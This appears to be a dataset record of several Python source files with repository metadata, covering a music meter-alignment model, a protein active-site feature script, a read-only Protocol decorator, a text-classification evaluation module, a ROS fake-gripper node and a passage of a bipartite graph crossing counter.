| 0
| 0
| 0
| 0
| 0
| 1
| 0.117647
| false
| 0
| 0.117647
| 0
| 0.323529
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
ddb1e5dab629942b29ba8fb6aab9cb866f52c858
| 13,098
|
py
|
Python
|
model/meter.py
|
meiwei92/meter-alignment
|
dc92e4aca0ca80ed1c9418027b050e9631b5fb7a
|
[
"MIT"
] | null | null | null |
model/meter.py
|
meiwei92/meter-alignment
|
dc92e4aca0ca80ed1c9418027b050e9631b5fb7a
|
[
"MIT"
] | null | null | null |
model/meter.py
|
meiwei92/meter-alignment
|
dc92e4aca0ca80ed1c9418027b050e9631b5fb7a
|
[
"MIT"
] | null | null | null |
from __future__ import annotations
from typing import List, Tuple, OrderedDict as OrderedDictType, DefaultDict, Optional
from collections import OrderedDict, defaultdict
from metric import MusicNote, TimePointSequence
from model.base import MidiModel, MidiModelState
from model.beat import TatumTrackingModelState, TatumTrackingGrammarModelState
from model.voice import VoiceSplittingModelState, VoiceSplittingGrammarModelState
from model.hierarchy import HierarchyModelState, HierarchyGrammarModelState
class MeterModel(MidiModel):
new_voice_states: DefaultDict[VoiceSplittingModelState, List[VoiceSplittingModelState]]
new_tatum_states: DefaultDict[TatumTrackingModelState, DefaultDict[Tuple[MusicNote], List[TatumTrackingModelState]]]
def __init__(self, hierarchy_state: HierarchyModelState = None,
voice_state: VoiceSplittingModelState = None,
tatum_state: TatumTrackingModelState = None,
beam_size: int = 200):
super(MeterModel).__init__()
self.beam_size = -1 if beam_size is None else beam_size
self.started = False
self.new_voice_states = defaultdict(lambda: [])
self.new_tatum_states = defaultdict(lambda: defaultdict(lambda: []))
self.started_states: OrderedDictType[MeterModelState, None] = OrderedDict()
self.hypothesis_states: OrderedDictType[MeterModelState, None] = OrderedDict()
mms = MeterModelState(meter_model=self,
hierarchy_state=hierarchy_state,
voice_state=voice_state,
tatum_state=tatum_state)
self.hypothesis_states.update({mms: None})
def get_beam_size(self) -> int:
return self.beam_size
def is_beam_full(self) -> bool:
return (not self.beam_size <= -1) and (len(self.started_states) >= self.beam_size)
def transition(self, notes: List[MusicNote] = None) -> OrderedDictType[MeterModelState]:
return self.__transition_close_worker(notes=notes, none_as_close=False)
def close(self) -> OrderedDictType[MeterModelState]:
return self.__transition_close_worker(notes=None, none_as_close=True)
def __transition_close_worker(self, notes: List[MusicNote] = None, none_as_close=False) -> OrderedDictType[MeterModelState]:
new_states: OrderedDict[MeterModelState, None] = OrderedDict()
do_close = (notes is None and none_as_close)
self.started_states = OrderedDict()
self.new_tatum_states = defaultdict(lambda: defaultdict(lambda: []))
self.new_voice_states = defaultdict(lambda: [])
if not self.started:
self.started = True
for mms in self.hypothesis_states:
if do_close:
ts = mms.close()
else:
ts = mms.transition(notes)
for ns in ts.keys():
new_states.update({ns: None})
if ns.is_started():
self.started_states.update({ns: None})
## fixForBeam ????
if not do_close:
#todo logging
pass
self.hypothesis_states = new_states
return self.hypothesis_states
def get_hypotheses(self) -> OrderedDictType[MidiModelState, None]:
pass
def get_tatum_hypotheses(self) -> List[TatumTrackingModelState]:
tatum_hypotheses = []
for mms in self.hypothesis_states:
tatum_hypotheses.append(mms.tatum_tracking_state)
return tatum_hypotheses
class MeterGrammarModel(MeterModel):
def __init__(self, sequence: TimePointSequence, beam_size: int = 200):
hs: HierarchyModelState = HierarchyGrammarModelState(sequence=sequence)
vs: VoiceSplittingModelState = VoiceSplittingGrammarModelState(sequence=sequence)
ts: TatumTrackingModelState = TatumTrackingGrammarModelState(sequence=sequence)
super(MeterGrammarModel, self).__init__(hierarchy_state=hs, voice_state=vs, tatum_state=ts, beam_size=beam_size)
class MeterPredictionModel(MeterModel):
def __init__(self, sequence: TimePointSequence, beam_size: int = 200):
super(MeterPredictionModel, self).__init__(beam_size=beam_size)
pass
class MeterModelState(MidiModelState):
def __init__(self, meter_model: MeterModel,
hierarchy_state: HierarchyModelState,
voice_state: VoiceSplittingModelState = None,
tatum_state: TatumTrackingModelState = None) -> None:
super(MeterModelState).__init__()
tts_none = tatum_state is None
vss_none = voice_state is None
# voice_state and tatum_state must be both set or both None. One set and one None is not allowed.
if tts_none == vss_none:
self.meter_model: MeterModel = meter_model
self.voice_splitting_state: VoiceSplittingModelState = voice_state
self.hierarchy_state: HierarchyModelState = hierarchy_state
self.tatum_tracking_state: TatumTrackingModelState = tatum_state
# this branch can only be reached if both values have the same truth value
# therefore just checking one is enough
if tts_none:
self.voice_splitting_state = hierarchy_state.get_voice_splitting_state()
self.tatum_tracking_state = self.hierarchy_state.get_tatum_tracking_state().deep_copy()
self.hierarchy_state = self.hierarchy_state.deep_copy()
self.tatum_tracking_state.set_hierarchy_state(self.hierarchy_state)
else:
raise ValueError("Given value-combination is not supported")
def set_tatum_tracking_state(self, state: TatumTrackingModelState):
self.tatum_tracking_state = state
def set_voice_splitting_state(self, state: VoiceSplittingModelState):
self.voice_splitting_state = state
def set_hierarchy_state(self, state: HierarchyModelState):
self.hierarchy_state = state
def transition(self, notes: List[MusicNote] = None) -> OrderedDictType[MeterModelState]:
return self.__transition_close_worker(notes=notes, none_as_close=False)
def close(self) -> OrderedDictType[MeterModelState]:
return self.__transition_close_worker(notes=None, none_as_close=True)
def __transition_close_worker(self, notes: List[MusicNote] = None, none_as_close=False) -> OrderedDictType[MeterModelState, None]:
new_state: OrderedDictType[MeterModelState, None] = OrderedDict()
do_close = (notes is None and none_as_close)
beam_full = self.meter_model.is_beam_full()
if beam_full:
voice_outside_beam = self.get_score() < next(reversed(self.meter_model.started_states)).get_score()
if voice_outside_beam:
return new_state
new_voice_states: List[VoiceSplittingModelState] = self.meter_model.new_voice_states[self.voice_splitting_state]
if len(new_voice_states) == 0:
if do_close:
state_dict = self.voice_splitting_state.close()
else:
state_dict = self.voice_splitting_state.transition(notes)
new_voice_states = [*state_dict.keys()]
self.meter_model.new_voice_states.update({self.voice_splitting_state: new_voice_states})
new_tatum_states = []
new_notes_list = []
for v_state in new_voice_states:
if beam_full:
beat_score = v_state.get_score() + \
self.tatum_tracking_state.get_score() + \
self.tatum_tracking_state.get_hierarchy_state().get_score()
tatum_outside_beam = beat_score <= next(reversed(self.meter_model.started_states)).get_score()
if tatum_outside_beam:
if not do_close:
new_notes_list.append([])
new_tatum_states.append([])
continue
tatum_state_copy = self.tatum_tracking_state.deep_copy()
tatum_state_copy.set_hierarchy_state(self.tatum_tracking_state.hierarchy_state)
if do_close:
nts = tatum_state_copy.close()
nts = [*nts.keys()]
new_tatum_states.append(nts)
else:
new_notes: List[MusicNote] = []
for n in notes:
if self.voice_splitting_state.keep_note(n):
new_notes.append(n)
new_notes_list.append(new_notes)
if tatum_state_copy.is_started():
nts = tatum_state_copy.transition(notes)
nts = [*nts.keys()]
new_tatum_states.append(nts)
else:
tatums_map = self.meter_model.new_tatum_states[tatum_state_copy]
if len(tatums_map) == 0:
pass
branched_states = tatums_map[tuple(new_notes)]
if len(branched_states) == 0:
bs = tatum_state_copy.transition(new_notes)
branched_states = [*bs.keys()]
tatums_map.update({tuple(new_notes): branched_states})
new_tatum_states.append(branched_states)
for i in range(len(new_tatum_states)):
new_voice_state = new_voice_states[i]
tatum_states = new_tatum_states[i]
nnotes = new_notes_list[i] if not do_close else []
new_states_tmp = []
for tstate in tatum_states:
beat_score = new_voice_state.get_score() + \
tstate.get_score() + \
tstate.get_hierarchy_state().get_score()
if beam_full:
state_outside_beam = next(reversed(self.meter_model.started_states)).get_score() >= beat_score
if state_outside_beam:
# todo: Logging
continue
hierarchy_state_copy: HierarchyModelState = self.hierarchy_state.deep_copy()
hierarchy_state_copy.set_voice_splitting_state(new_voice_state)
hierarchy_state_copy.set_tatum_tracking_state(tstate)
tstate.set_hierarchy_state(hierarchy_state_copy)
if not do_close:
# todo: Special case
pass
if do_close:
new_hierarchy_states = hierarchy_state_copy.close()
else:
new_hierarchy_states = hierarchy_state_copy.transition(nnotes)
new_hierarchy_states = [*new_hierarchy_states.keys()]
for hms in new_hierarchy_states:
self.add_new_state(hms, new_states_tmp, check_duplicate=True)
for mms in new_states_tmp:
new_state.update({mms: None})
return new_state
def get_score(self) -> float:
vs_score = 0 if self.voice_splitting_state is None else self.voice_splitting_state.get_score()
tt_score = 0 if self.tatum_tracking_state is None else self.tatum_tracking_state.get_score()
h_score = 0 if self.hierarchy_state is None else self.hierarchy_state.get_score()
return vs_score + tt_score + h_score
def add_new_state(self, hms: HierarchyModelState,
temp_states_list: List[MeterModelState] = [], check_duplicate: bool = True):
mms = MeterModelState(meter_model=self.meter_model, hierarchy_state=hms)
if not check_duplicate:
temp_states_list.append(mms)
else:
duplicated_state: Optional[MeterModelState] = None
for s in temp_states_list:
if s.is_duplicate_of(mms):
duplicated_state = s
break
if duplicated_state is not None:
if duplicated_state.get_score() < mms.get_score():
temp_states_list.append(mms)
temp_states_list.remove(duplicated_state)
# todo add logging for removal of duplicated_state
else:
# todo add logging for removal of mms
pass
else:
temp_states_list.append(mms)
def is_duplicate_of(self, state: MeterModelState) -> bool:
hierachy_duplicate = self.hierarchy_state.is_duplicate_of(state.hierarchy_state)
tatum_duplicate = self.tatum_tracking_state.is_duplicate_of(state.tatum_tracking_state)
voice_duplicate = True
# if something change voice_duplicate (todo at MeterDetection phase)
# voice_duplicate = self.voice_splitting_state.is_duplicate_of(state.voice_splitting_state)
return hierachy_duplicate and tatum_duplicate and voice_duplicate
def get_measure_count(self):
return self.tatum_tracking_state.get_measure_count()
def is_started(self) -> bool:
measure_count = self.get_measure_count()
return measure_count > 0
| 42.803922
| 134
| 0.64506
| 1,431
| 13,098
| 5.561845
| 0.113906
| 0.056288
| 0.038447
| 0.03317
| 0.351049
| 0.239854
| 0.181053
| 0.181053
| 0.153663
| 0.124387
| 0
| 0.001916
| 0.282791
| 13,098
| 305
| 135
| 42.944262
| 0.845327
| 0.038861
| 0
| 0.253394
| 0
| 0
| 0.003181
| 0
| 0
| 0
| 0
| 0.003279
| 0
| 1
| 0.099548
| false
| 0.027149
| 0.036199
| 0.031674
| 0.226244
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
ddb3b3248298a56481c0e14a355de5998e1c7be4
| 1,029
|
py
|
Python
|
hw2skeleton/find_features.py
|
hasuni-max/hw2-skeleton
|
498f5d250ec18042c1e21fac177a92f3c7d3da7c
|
[
"Apache-2.0"
] | null | null | null |
hw2skeleton/find_features.py
|
hasuni-max/hw2-skeleton
|
498f5d250ec18042c1e21fac177a92f3c7d3da7c
|
[
"Apache-2.0"
] | null | null | null |
hw2skeleton/find_features.py
|
hasuni-max/hw2-skeleton
|
498f5d250ec18042c1e21fac177a92f3c7d3da7c
|
[
"Apache-2.0"
] | null | null | null |
global plus
global minus
minus = ["ASP","GLU"]
plus = ["ARG","HIS","LYS"]
def find_charge(residues):
"""
Takes a list of residues and returns the number of plus and
minus charged residues.
This function uses the global plus and minus variables
"""
global plus
global minus
plus_charge = sum([res in plus for res in residues])
minus_charge = sum([res in minus for res in residues])
return plus_charge, minus_charge
def calc_features(active_sites):
features = {}
for act in active_sites:
features[act.name] = []
number_of_residues = len(act.residues)
three_letter = [str(x)[0:3] for x in act.residues]
plus_charge, minus_charge = find_charge(three_letter)
number_of_chains = len(act.chains)
features[act.name].append(number_of_residues) #number of residues
features[act.name].append(plus_charge) #number of plus charges - done
features[act.name].append(minus_charge) #number of minus charges - done
features[act.name].append(number_of_chains) #number of chains - done
return features
| 25.097561
| 73
| 0.737609
| 158
| 1,029
| 4.658228
| 0.297468
| 0.097826
| 0.101902
| 0.11413
| 0.137228
| 0.137228
| 0
| 0
| 0
| 0
| 0
| 0.002315
| 0.16035
| 1,029
| 40
| 74
| 25.725
| 0.849537
| 0.234208
| 0
| 0.173913
| 0
| 0
| 0.019557
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.086957
| false
| 0
| 0
| 0
| 0.173913
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
ddbaaba267f11c03c921ef7b0388970b8db8a6b9
| 2,396
|
py
|
Python
|
src/quacks/__init__.py
|
ariebovenberg/quacks
|
839d307b24f3f37d9a5318c16acb631b9a1153f0
|
[
"MIT"
] | 11
|
2021-12-12T20:51:15.000Z
|
2022-02-02T12:08:32.000Z
|
src/quacks/__init__.py
|
ariebovenberg/quacks
|
839d307b24f3f37d9a5318c16acb631b9a1153f0
|
[
"MIT"
] | 8
|
2021-12-14T12:53:51.000Z
|
2022-03-15T04:29:44.000Z
|
src/quacks/__init__.py
|
ariebovenberg/quacks
|
839d307b24f3f37d9a5318c16acb631b9a1153f0
|
[
"MIT"
] | 1
|
2021-12-15T16:50:34.000Z
|
2021-12-15T16:50:34.000Z
|
from typing import _GenericAlias # type: ignore
from typing import ClassVar
from typing_extensions import Protocol
# Single-sourcing the version number with poetry:
# https://github.com/python-poetry/poetry/pull/2366#issuecomment-652418094
try:
__version__ = __import__("importlib.metadata").metadata.version(__name__)
except ModuleNotFoundError: # pragma: no cover
__version__ = __import__("importlib_metadata").version(__name__)
__all__ = ["readonly"]
def readonly(cls: type) -> type:
"""Decorate a :class:`~typing.Protocol` to make it read-only.
Unlike default protocol attributes, read-only protocols will match
frozen dataclasses and other immutable types.
Read-only attributes are already supported in protocols with
``@property``, but this is cumbersome to do for many attributes.
The ``@readonly`` decorator effectively transforms all mutable attributes
into read-only properties.
Example
-------
.. code-block:: python
from quacks import readonly
@readonly
class User(Protocol):
id: int
name: str
is_premium: bool
# equivalent to:
class User(Protocol):
@property
def id(self) -> int: ...
@property
def name(self) -> str: ...
@property
def is_premium(self) -> bool: ...
Warning
-------
Subprotocols and inherited attributes are not supported yet.
"""
if not _is_a_protocol(cls):
raise TypeError("Readonly decorator can only be applied to Protocols.")
elif any(b is not Protocol and _is_a_protocol(b) for b in cls.__bases__):
raise NotImplementedError("Subprotocols not yet supported.")
for name, typ in getattr(cls, "__annotations__", {}).items():
if not _is_classvar(typ):
@property # type: ignore
def prop(self): # type: ignore
... # pragma: no cover
prop.fget.__name__ = name # type: ignore
prop.fget.__annotations__ = {"return": typ} # type: ignore
setattr(cls, name, prop)
return cls
def _is_a_protocol(t: type) -> bool:
# Only classes *directly* inheriting from Protocol are protocols.
return Protocol in t.__bases__
def _is_classvar(t: type) -> bool:
return type(t) is _GenericAlias and t.__origin__ is ClassVar
| 29.95
| 79
| 0.647329
| 280
| 2,396
| 5.285714
| 0.414286
| 0.033784
| 0.022297
| 0.040541
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.007307
| 0.257513
| 2,396
| 79
| 80
| 30.329114
| 0.824621
| 0.479549
| 0
| 0
| 0
| 0
| 0.131907
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.153846
| false
| 0
| 0.192308
| 0.076923
| 0.461538
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
ddbb30413bba7d94f4e08a1b8b5b0f62d116a712
| 13,818
|
py
|
Python
|
gobbli/inspect/evaluate.py
|
RTIInternational/gobbli
|
d9ec8132f74ce49dc4bead2fad25b661bcef6e76
|
[
"Apache-2.0"
] | 276
|
2019-09-13T08:25:51.000Z
|
2022-03-05T13:07:55.000Z
|
gobbli/inspect/evaluate.py
|
RTIInternational/gobbli
|
d9ec8132f74ce49dc4bead2fad25b661bcef6e76
|
[
"Apache-2.0"
] | 15
|
2019-09-06T14:05:30.000Z
|
2022-01-01T20:15:06.000Z
|
gobbli/inspect/evaluate.py
|
RTIInternational/gobbli
|
d9ec8132f74ce49dc4bead2fad25b661bcef6e76
|
[
"Apache-2.0"
] | 24
|
2019-09-18T15:11:42.000Z
|
2021-12-23T18:59:55.000Z
|
from dataclasses import dataclass
from typing import Callable, Dict, List, Optional, Sequence, Tuple, Union
import altair as alt
import pandas as pd
from sklearn.metrics import (
accuracy_score,
classification_report,
f1_score,
precision_score,
recall_score,
)
from gobbli.util import (
as_multiclass,
as_multilabel,
escape_line_delimited_text,
is_multilabel,
multilabel_to_indicator_df,
pred_prob_to_pred_label,
pred_prob_to_pred_multilabel,
truncate_text,
)
@dataclass
class ClassificationError:
"""
Describes an error in classification. Reports the original text,
the true label, and the predicted probability.
Args:
X: The original text.
y_true: The true label(s).
y_pred_proba: The model predicted probability for each class.
"""
X: str
y_true: Union[str, List[str]]
y_pred_proba: Dict[str, float]
@property
def y_pred(self) -> str:
"""
Returns:
The class with the highest predicted probability for this observation.
"""
return max(self.y_pred_proba, key=lambda k: self.y_pred_proba[k])
def y_pred_multilabel(self, threshold: float = 0.5) -> List[str]:
"""
Args:
threshold: The predicted probability threshold for predictions
Returns:
The predicted labels for this observation (predicted probability greater than
the given threshold)
"""
return pred_prob_to_pred_multilabel(self.y_pred_proba, threshold)
MetricFunc = Callable[[Sequence[str], pd.DataFrame], float]
"""
A function used to calculate some metric. It should accept a sequence of true labels (y_true)
and a dataframe of shape (n_samples, n_classes) containing predicted probabilities; it should
output a real number.
"""
DEFAULT_METRICS: Dict[str, MetricFunc] = {
"Weighted F1 Score": lambda y_true, y_pred: f1_score(
y_true, y_pred, average="weighted"
),
"Weighted Precision Score": lambda y_true, y_pred: precision_score(
y_true, y_pred, average="weighted"
),
"Weighted Recall Score": lambda y_true, y_pred: recall_score(
y_true, y_pred, average="weighted"
),
"Accuracy": lambda y_true, y_pred: accuracy_score(y_true, y_pred),
}
"""
The default set of metrics to evaluate classification models with. Users may want to extend
this.
"""
@dataclass
class ClassificationEvaluation:
"""
Provides several methods for evaluating the results from a classification problem.
Args:
labels: The set of unique labels in the dataset.
X: The list of texts that were classified.
y_true: The true labels for the dataset.
y_pred_proba: A dataframe containing a row for each observation in X and a
column for each label in the training data. Cells are predicted probabilities.
"""
labels: List[str]
X: List[str]
y_true: Union[List[str], List[List[str]]]
y_pred_proba: pd.DataFrame
metric_funcs: Optional[Dict[str, Callable[[Sequence, Sequence], float]]] = None
def __post_init__(self):
if not len(self.y_true) == self.y_pred_proba.shape[0]:
raise ValueError(
"y_true and y_pred_proba must have the same number of observations"
)
self.multilabel = is_multilabel(self.y_true)
@property
def y_true_multiclass(self) -> List[str]:
return as_multiclass(self.y_true, self.multilabel)
@property
def y_true_multilabel(self) -> pd.DataFrame:
return multilabel_to_indicator_df(
as_multilabel(self.y_true, self.multilabel), self.labels
)
@property
def y_pred_multiclass(self) -> List[str]:
"""
Returns:
Predicted class for each observation (assuming multiclass context).
"""
return pred_prob_to_pred_label(self.y_pred_proba)
@property
def y_pred_multilabel(self) -> pd.DataFrame:
"""
Returns:
Indicator dataframe containing a 0 if each label wasn't predicted and 1 if
it was for each observation.
"""
return pred_prob_to_pred_multilabel(self.y_pred_proba).astype("int")
def metrics(self) -> Dict[str, float]:
"""
Returns:
A dictionary containing various metrics of model performance on the test dataset.
"""
metric_funcs = self.metric_funcs
if metric_funcs is None:
metric_funcs = DEFAULT_METRICS
if self.multilabel:
y_true: Union[List[str], pd.DataFrame] = self.y_true_multilabel
y_pred: Union[List[str], pd.DataFrame] = self.y_pred_multilabel
else:
y_true = self.y_true_multiclass
y_pred = self.y_pred_multiclass
return {
name: metric_func(y_true, y_pred)
for name, metric_func in metric_funcs.items()
}
def metrics_report(self) -> str:
"""
Returns:
A nicely formatted human-readable report describing metrics of model performance
on the test dataset.
"""
metric_string = "\n".join(
f"{name}: {metric}" for name, metric in self.metrics().items()
)
if self.multilabel:
y_true: Union[pd.DataFrame, List[str]] = self.y_true_multilabel
y_pred: Union[pd.DataFrame, List[str]] = self.y_pred_multilabel
# Since these are indicator dataframes, the "labels" are indices
labels: Union[List[str], List[int]] = list(range(len(self.labels)))
else:
y_true = self.y_true_multiclass
y_pred = self.y_pred_multiclass
# Since these are lists of labels, the "labels" are the strings themselves
labels = self.labels
return (
"Metrics:\n"
"--------\n"
f"{metric_string}\n\n"
"Classification Report:\n"
"----------------------\n"
f"{classification_report(y_true, y_pred, labels=labels, target_names=self.labels)}\n"
)
def plot(self, sample_size: Optional[int] = None) -> alt.Chart:
"""
Args:
sample_size: Optional number of points to sample for the plot. Unsampled
plots may be difficult to save due to their size.
Returns:
An Altair chart visualizing predicted probabilities and true classes to visually identify
where errors are being made.
"""
# Since multilabel is a generalization of the multiclass paradigm, implement
# this visualization the same for multiclass and multilabel using the multilabel
# format
pred_prob_df = self.y_pred_proba
true_df = self.y_true_multilabel
if sample_size is not None:
# Avoid errors due to sample being larger than the population if the number
# of observations is smaller than the sample size
pred_prob_df = pred_prob_df.sample(
n=min(sample_size, pred_prob_df.shape[0])
)
true_df = true_df.iloc[pred_prob_df.index]
charts = []
if self.multilabel:
legend_label = "Has Label"
else:
legend_label = "Belongs to Class"
for label in self.labels:
# Plot the predicted probabilities for given label for all observations
plot_df = (
pred_prob_df[[label]]
.rename({label: "Predicted Probability"}, axis="columns")
.join(
true_df[[label]]
.astype("bool")
.rename({label: legend_label}, axis="columns")
)
)
charts.append(
alt.layer(
alt.Chart(plot_df, title=label, height=40)
.mark_circle(size=8)
.encode(
x=alt.X(
"Predicted Probability",
type="quantitative",
title=None,
scale=alt.Scale(domain=(0.0, 1.0)),
),
y=alt.Y(
"jitter",
type="quantitative",
title=None,
axis=alt.Axis(
values=[0], ticks=True, grid=False, labels=False
),
scale=alt.Scale(),
),
color=alt.Color(legend_label, type="nominal"),
)
.transform_calculate(
# Generate Gaussian jitter with a Box-Muller transform
jitter="sqrt(-2*log(random()))*cos(2*PI*random())/32"
)
.properties(height=40)
)
)
return alt.vconcat(*charts)
def errors_for_label(self, label: str, k: int = 10):
"""
Output the biggest mistakes for the given class by the classifier
Args:
label: The label to return errors for.
k: The number of results to return for each of false positives and false negatives.
Returns:
A 2-tuple. The first element is a list of the top ``k`` false positives, and the
second element is a list of the top ``k`` false negatives.
"""
pred_label = self.y_pred_multilabel[label].astype("bool")
true_label = self.y_true_multilabel[label].astype("bool")
# Order false positives/false negatives by the degree of the error;
# i.e. we want the false positives with highest predicted probability first
# and false negatives with lowest predicted probability first
# Take the top `k` of each
false_positives = (
self.y_pred_proba.loc[pred_label & ~true_label]
.sort_values(by=label, ascending=False)
.iloc[:k]
)
false_negatives = (
self.y_pred_proba.loc[~pred_label & true_label]
.sort_values(by=label, ascending=True)
.iloc[:k]
)
def create_classification_errors(
y_pred_proba: pd.DataFrame,
) -> List[ClassificationError]:
classification_errors = []
for ndx, row in y_pred_proba.iterrows():
classification_errors.append(
ClassificationError(
X=self.X[ndx],
y_true=self.y_true[ndx],
y_pred_proba=row.to_dict(),
)
)
return classification_errors
return (
create_classification_errors(false_positives),
create_classification_errors(false_negatives),
)
def errors(
self, k: int = 10
) -> Dict[str, Tuple[List[ClassificationError], List[ClassificationError]]]:
"""
Output the biggest mistakes for each class by the classifier.
Args:
k: The number of results to return for each of false positives and false negatives.
Returns:
A dictionary whose keys are label names and values are 2-tuples. The first
element is a list of the top ``k`` false positives, and the second element is a list
of the top ``k`` false negatives.
"""
errors = {}
for label in self.labels:
errors[label] = self.errors_for_label(label, k=k)
return errors
def errors_report(self, k: int = 10) -> str:
"""
Args:
k: The number of results to return for each of false positives and false negatives.
Returns:
A nicely-formatted human-readable report describing the biggest mistakes made by
the classifier for each class.
"""
errors = self.errors(k=k)
output = "Errors Report\n" "------------\n\n"
for label, (false_positives, false_negatives) in errors.items():
def make_errors_str(errors: List[ClassificationError]) -> str:
if self.multilabel:
return "\n".join(
(
f"Correct Value: {label in e.y_true}\n"
f"Predicted Probability: {e.y_pred_proba[label]}"
f"Text: {truncate_text(escape_line_delimited_text(e.X), 500)}\n"
)
for e in errors
)
else:
return "\n".join(
(
f"True Class: {e.y_true}\n"
f"Predicted Class: {e.y_pred} (Probability: {e.y_pred_proba[e.y_pred]})\n"
f"Text: {truncate_text(escape_line_delimited_text(e.X), 500)}\n"
)
for e in errors
)
false_positives_str = make_errors_str(false_positives)
if len(false_positives_str) == 0:
false_positives_str = "None"
false_negatives_str = make_errors_str(false_negatives)
if len(false_negatives_str) == 0:
false_negatives_str = "None"
header_name = "CLASS" if self.multilabel else "LABEL"
output += (
" -------\n"
f"| {header_name}: {label}\n"
" -------\n\n"
"False Positives\n"
"***************\n\n"
f"{false_positives_str}\n\n"
"False Negatives\n"
"***************\n\n"
f"{false_negatives_str}\n\n"
)
return output
| 35.25
| 102
| 0.56506
| 1,603
| 13,818
| 4.700561
| 0.181535
| 0.029197
| 0.025216
| 0.013271
| 0.269542
| 0.190577
| 0.17213
| 0.148242
| 0.125415
| 0.11294
| 0
| 0.004316
| 0.345998
| 13,818
| 391
| 103
| 35.340153
| 0.829479
| 0.236793
| 0
| 0.194915
| 0
| 0.004237
| 0.108301
| 0.033371
| 0
| 0
| 0
| 0
| 0
| 1
| 0.063559
| false
| 0
| 0.025424
| 0.008475
| 0.194915
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
ddbc20a9147b17ccfb31328be56cce367423b65a
| 791
|
py
|
Python
|
victor_fake_hardware_interface/scripts/fake_grippers_node.py
|
MMintLab/kuka_iiwa_interface
|
0dd258641377263e7275bc63f37cf32eb12f3e56
|
[
"BSD-2-Clause"
] | 5
|
2021-01-11T09:00:26.000Z
|
2021-12-13T15:59:01.000Z
|
victor_fake_hardware_interface/scripts/fake_grippers_node.py
|
MMintLab/kuka_iiwa_interface
|
0dd258641377263e7275bc63f37cf32eb12f3e56
|
[
"BSD-2-Clause"
] | 35
|
2020-07-01T14:48:40.000Z
|
2021-07-13T18:38:53.000Z
|
victor_fake_hardware_interface/scripts/fake_grippers_node.py
|
MMintLab/kuka_iiwa_interface
|
0dd258641377263e7275bc63f37cf32eb12f3e56
|
[
"BSD-2-Clause"
] | 1
|
2021-01-08T23:39:17.000Z
|
2021-01-08T23:39:17.000Z
|
#!/usr/bin/env python
import rospy
from victor_fake_hardware_interface.minimal_fake_arm_interface import MinimalFakeGripperInterface
def main():
rospy.init_node("minimal_fake_arm_interface")
interfaces = {}
arm_names = ["left_arm", "right_arm"]
for arm in arm_names:
interfaces[arm + "/gripper"] = MinimalFakeGripperInterface(gripper_command_topic=arm + "/gripper_command",
gripper_status_topic=arm + "/gripper_status")
for arm in arm_names:
interfaces[arm + "/gripper"].start_feedback_threads()
rospy.loginfo("Publishing data...")
rospy.spin()
for arm in arm_names:
interfaces[arm + "/gripper"].join_feedback_threads()
if __name__ == '__main__':
main()
| 27.275862
| 114
| 0.652339
| 86
| 791
| 5.604651
| 0.44186
| 0.103734
| 0.049793
| 0.068465
| 0.224066
| 0.224066
| 0.224066
| 0.224066
| 0
| 0
| 0
| 0
| 0.241467
| 791
| 28
| 115
| 28.25
| 0.803333
| 0.025284
| 0
| 0.176471
| 0
| 0
| 0.161039
| 0.033766
| 0
| 0
| 0
| 0
| 0
| 1
| 0.058824
| false
| 0
| 0.117647
| 0
| 0.176471
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
ddbc90c6ac864e7ce62505e078e39b8bc44056dd
| 11,647
|
py
|
Python
|
python/bgraph.py
|
brunodferrari/bdp
|
d320add1e451c85b6777ae34901bbd6fd3797114
|
[
"Unlicense"
] | null | null | null |
python/bgraph.py
|
brunodferrari/bdp
|
d320add1e451c85b6777ae34901bbd6fd3797114
|
[
"Unlicense"
] | null | null | null |
python/bgraph.py
|
brunodferrari/bdp
|
d320add1e451c85b6777ae34901bbd6fd3797114
|
[
"Unlicense"
] | null | null | null |
# -*- coding: utf-8 -*-
import numpy as np
import matplotlib.pyplot as plt
import networkx as nx
import pandas as pd
import copy
from numba import njit
from numba.typed import Dict, List
from numba.core import types
from concurrent.futures import ThreadPoolExecutor
np.seterr(over='ignore')
def pi(setlist, i):
try:
return np.int(np.where(np.array(setlist) == i )[0])
except FutureWarning:
print(setlist, i)
except TypeError:
return -1
def crossing(G):
aux = G.edges().copy()
c = 0
while len(aux) > 0:
e1 = aux.pop(0)
i = e1[0]
k = e1[1]
for e2 in aux:
j = e2[0]
l = e2[1]
if (G.pi_1[i] < G.pi_1[j]) and (G.pi_2[k] > G.pi_2[l]) and (G.pi_1[i] * G.pi_1[j] * G.pi_2[k] * G.pi_2[l]):
c = c + 1
